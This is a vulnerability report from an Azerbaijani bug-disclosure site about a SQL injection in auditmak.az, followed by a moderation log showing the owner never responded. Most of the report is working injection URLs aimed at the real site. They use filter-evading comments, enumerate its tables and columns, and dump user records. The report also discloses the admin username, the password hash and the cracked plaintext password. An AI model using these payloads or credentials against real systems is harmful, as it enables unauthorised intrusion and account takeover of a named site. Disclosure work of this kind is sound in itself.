SQL injection

auditmak.az 22 İyun 2016, 12:06

Ətraflı məlumat

SQl inject here: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27%20%2F*!12345union*%2F%20%2F*!12345select*%2F%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11--%20-%27
Table names: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(table_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.tables*/+/*!12345where*/+/*!12345table_schema=database()*/--+-%27
USers: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(column_name)*/,9,10,11+/*!12345from*/+/*!12345information_schema.columns*/+/*!12345where*/+/*!12345table_name=0x7573657273*/--+-%27
Username and password dump: http://www.auditmak.az/index.php?type=content&subid=2&cid=-16%27+/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,/*!12345group_concat(username,0x3a,password)*/,9,10,11+/*!12345from*/+/*!12345users*/--+-%27
username: admin
password: 5edc2995b340ac9fd2cc555e94384c87 md5 hash( makaudit123 )

Skrinşotlar

Qeydlər

 • 21 Oktyabr 2016, 14:01
  Boşluğun statusu
  Mənbədən cavab gəlmədi

 • 04 Oktyabr 2016, 10:04
  Boşluğa bal verildi
  Boşluğun tərcüməsi üçün tərcüməçiyə 10 bal verildi

 • 04 Oktyabr 2016, 10:04
  Boşluğa bal verildi
  Boşluğun tərcüməsinə görə müəllifə 1 bal verildi

 • 07 Sentyabr 2016, 13:51
  Boşluğun statusu
  Mənbəyə boşluq haqqında e-poçt göndərildi

 • 07 Sentyabr 2016, 11:31
  Boşluğa bal verildi
  Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 10 bal təyin etdi

 • 07 Sentyabr 2016, 11:12
  Boşluğun statusu
  Moderator tərəfindən təsdiq edildi

 • 06 Sentyabr 2016, 18:03
  Boşluq dəyişdirildi
  Boşluq "SQL injection" dəyişdirildi

 • 30 İyun 2016, 14:49
  Boşluq imtina edildi
  Linklər qeyd edilən məlumatı göstərmir. Zəhmət lmasa screenlər yollayın.

 • 22 İyun 2016, 12:06
  Boşluq əlavə edildi
  Boşluq BUGemota əlavə edildi